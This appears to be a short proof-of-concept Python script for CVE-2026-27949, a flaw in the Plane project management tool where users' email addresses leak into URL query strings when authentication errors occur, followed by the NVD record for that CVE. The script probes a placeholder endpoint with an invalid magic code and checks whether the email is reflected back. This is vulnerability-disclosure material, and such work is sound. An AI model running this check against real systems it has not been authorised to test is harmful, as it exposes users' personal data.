CVE-2026-27949

# PoC for CVE-2026-27949: Information Disclosure via Query Parameter import requests def check_poc(target_url, email): # Simulating the vulnerable endpoint where email is passed in URL # during an error scenario (e.g. invalid magic code) params = { "email": email, "code": "INVALID_CODE" } try: response = requests.get(target_url, params=params, allow_redirects=False) # Check if the email is present in the URL (Location header or response URL) if email in response.url: print(f"[+] Vulnerability Confirmed: Email leaked in URL -> {response.url}") return True if 'Location' in response.headers and email in response.headers['Location']: print(f"[+] Vulnerability Confirmed: Email leaked in Redirect Location -> {response.headers['Location']}") return True print("[-] Vulnerability not detected in this specific request.") return False if __name__ == "__main__": target = "https://target-plane-instance.com/auth/verify-magic-code" user_email = "[email protected]" check_poc(target, user_email)

{"cve": {"id": "CVE-2026-27949", "sourceIdentifier": "[email protected]", "published": "2026-04-07T21:17:15.400", "lastModified": "2026-04-14T18:44:46.493", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Plane is an an open-source project management tool. Prior to 1.3.0, a vulnerability was identified in Plane's authentication flow where a user's email address is included as a query parameter in the URL during error handling (e.g., when an invalid magic code is submitted). Transmitting personally identifiable information (PII) via GET request query strings is classified as an insecure design practice. The affected code path is located in the authentication utility module (packages/utils/src/auth.ts). This vulnerability is fixed in 1.3.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:N/A:N", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.5, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-598"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:plane:plane:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.3.0", "matchCriteriaId": "A83B3D5C-1D3E-422F-BDE7-557F3EB8F934"}]}]}], "references": [{"url": "https://github.com/makeplane/plane/security/advisories/GHSA-8rvg-7w43-p2w2", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}